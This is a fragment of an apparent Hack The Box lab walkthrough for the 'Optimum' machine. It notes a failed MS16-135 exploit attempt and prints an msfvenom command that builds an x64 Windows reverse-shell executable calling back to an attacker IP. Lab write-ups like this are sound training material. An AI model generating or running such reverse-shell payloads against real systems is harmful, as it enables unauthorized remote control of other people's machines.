kookiecrack/HTB_Walkthrough/Optimum.md

 ```
 * MS16-135 exploit failed with error that target architecture needs to be x64.
 The target machine is x64.
 * Suspect that the initial reverse shell may have ran x86 shell.
 Create a new reverse shell executable using MSFvenom for x64 architecture and try running the exploit from that reverse shell.
+Failed.
 ```
 kali@kali:~/HTB/optimum$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=25 -f exe -o reverse25.
 exe